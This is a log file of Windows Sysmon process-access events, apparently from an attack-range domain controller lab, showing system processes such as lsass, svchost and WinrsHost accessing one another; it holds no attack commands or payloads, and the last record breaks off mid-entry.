{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5292,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.478\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.478","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5293,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.478\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.478","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5294,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.478\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D2-5F25-0000-001089BB0700}\r\nTargetProcessId: 2892\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.478","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D2-5F25-0000-001089BB0700}","TargetProcessId":"2892","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5295,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.478\r\nSourceProcessGUID: {E2A3D6B1-11D2-5F25-0000-001089BB0700}\r\nSourceProcessId: 2892\r\nSourceThreadId: 3144\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D2-5F25-0000-001007BB0700}\r\nTargetProcessId: 484\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.478","SourceProcessGUID":"{E2A3D6B1-11D2-5F25-0000-001089BB0700}","SourceProcessId":"2892","SourceThreadId":"3144","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D2-5F25-0000-001007BB0700}","TargetProcessId":"484","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5296,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.493\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D2-5F25-0000-001007BB0700}\r\nTargetProcessId: 484\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.493","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11D2-5F25-0000-001007BB0700}","TargetProcessId":"484","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5297,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.493\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nSourceProcessId: 1336\r\nSourceThreadId: 1660\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D2-5F25-0000-001007BB0700}\r\nTargetProcessId: 484\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.493","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","SourceProcessId":"1336","SourceThreadId":"1660","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11D2-5F25-0000-001007BB0700}","TargetProcessId":"484","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5298,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.509\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.509","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5299,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.509\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.509","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5300,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.509\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\